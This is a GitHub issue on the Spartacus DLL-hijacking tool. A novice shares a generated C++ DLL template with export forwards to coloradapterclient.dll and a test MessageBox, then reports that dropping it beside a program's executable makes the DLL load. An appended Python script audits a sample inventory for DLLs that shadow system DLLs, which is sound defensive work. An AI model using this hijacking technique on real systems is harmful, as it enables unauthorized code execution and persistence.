Accenture/Spartacus

What to do next, WITHOUT DLL Proxying?

windowshopr opened this issue · 1 comments

I read through the article that details how to sideload/proxy a DLL function, which is great, however (as a noob), I'm wondering if there's an article or some steps to follow for NOT proxying a function, and just using MAINDLL?

The steps I followed so far look like this:

  1. Created ProcMon log, parsed using Spartacus, and opened a created VS solution file.
  2. Have a code example that looks like this:

```cpp
#pragma once

#pragma comment(linker,"/export:ModernColorGetGDILutFromHDC=C:\\Windows\\System32\\coloradapterclient.ModernColorGetGDILutFromHDC,@1")
#pragma comment(linker,"/export:ModernColorSetGDILut=C:\\Windows\\System32\\coloradapterclient.ModernColorSetGDILut,@2")
#pragma comment(linker,"/export:ModernColorSetGDILutFromHDC=C:\\Windows\\System32\\coloradapterclient.ModernColorSetGDILutFromHDC,@3")
#pragma comment(linker,"/export:ModernColorSetLut=C:\\Windows\\System32\\coloradapterclient.ModernColorSetLut,@4")
#pragma comment(linker,"/export:ModernColorSetMatrix=C:\\Windows\\System32\\coloradapterclient.ModernColorSetMatrix,@5")
#pragma comment(linker,"/export:ModernColorSetMatrixFromHDC=C:\\Windows\\System32\\coloradapterclient.ModernColorSetMatrixFromHDC,@6")

#include <windows.h>
#include <ios>
#include <fstream>

//// Remove this line if you aren't proxying any functions.
//HMODULE hModule = LoadLibrary(L"C:\\Windows\\System32\\coloradapterclient.dll");

//// Remove this function if you aren't proxying any functions.
//VOID DebugToFile(LPCSTR szInput)
//{
//    std::ofstream log("spartacus-proxy-coloradapterclient.log", std::ios_base::app | std::ios_base::out);
//    log << szInput;
//    log << "\n";
//}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Sample for testing: pops a message box when the DLL is loaded into a process
        MessageBox(NULL, L"coloradapterclient.dll attached to", L"coloradapterclient.dll", MB_OK);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

  3. Compiled the DLL file, and it shows up in the project's "x64 > Debug" folder.

So now what? This is a silly question I know, but it's hard to figure this advanced stuff out as a newbie.

The DLL that gets compiled has the same name as the target DLL file, which I assume I don't want to overwrite with the target DLL file, but I assume we need to "link" the target DLL to this compiled DLL somehow, but again with no proxying.

Can I get some direction on how to get my test MessageBox to appear and perform my first DLL hijack!? :) Thanks!

We can totally close this issue! I've discovered that to get the compiled DLL to run, you can simply copy/paste it somewhere in the DLL lookup order and it'll trigger. In my case, I just put the compiled DLL into the same folder as the .exe of the program I'm hijacking, fired up the program and voila, message box appeared. Thanks for letting me work this out! Success!
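The behaviour described in this thread (a DLL dropped next to the executable is picked up ahead of the copy in System32) is also what a defender looks for when auditing an install. The following is an added example, not code from Spartacus or from the thread: it walks a constructed file inventory (paths and signer names are made up for illustration) and flags DLLs outside the system directories that share a name with a System32/SysWOW64 DLL, rating unsigned copies highest.

```python
"""Audit a file inventory for DLLs that shadow Windows system DLLs."""
from pathlib import PureWindowsPath

# Constructed inventory for the example: (path, Authenticode signer or None).
# In practice this would come from a file-system scan plus signature checks.
INVENTORY = [
    (r"C:\Windows\System32\coloradapterclient.dll", "Microsoft Windows"),
    (r"C:\Windows\System32\version.dll", "Microsoft Windows"),
    (r"C:\Program Files\ExampleApp\ExampleApp.exe", "Example Corp"),
    (r"C:\Program Files\ExampleApp\coloradapterclient.dll", None),   # shadows, unsigned
    (r"C:\Program Files\ExampleApp\version.dll", "Example Corp"),    # shadows, signed
    (r"C:\Program Files\ExampleApp\appcore.dll", "Example Corp"),    # app's own DLL
]

# Directories whose DLLs are the legitimate "targets" of a hijack.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")


def _is_system_path(p: PureWindowsPath) -> bool:
    return str(p.parent).lower() in SYSTEM_DIRS


def system_dll_names(inventory) -> set:
    """Lower-cased names of every DLL that lives in a system directory."""
    return {
        PureWindowsPath(path).name.lower()
        for path, _ in inventory
        if PureWindowsPath(path).suffix.lower() == ".dll"
        and _is_system_path(PureWindowsPath(path))
    }


def find_shadowing_dlls(inventory) -> list:
    """Return DLLs outside system dirs whose file name matches a system DLL.

    The application directory is searched before System32, so such a file is
    what gets loaded. An unsigned copy is the strongest signal.
    """
    names = system_dll_names(inventory)
    findings = []
    for path, signer in inventory:
        p = PureWindowsPath(path)
        if p.suffix.lower() != ".dll" or _is_system_path(p):
            continue
        if p.name.lower() in names:
            findings.append({"path": path, "signer": signer,
                             "severity": "high" if signer is None else "medium"})
    return findings


if __name__ == "__main__":
    for f in find_shadowing_dlls(INVENTORY):
        print(f"[{f['severity']}] {f['path']} (signer: {f['signer']})")
```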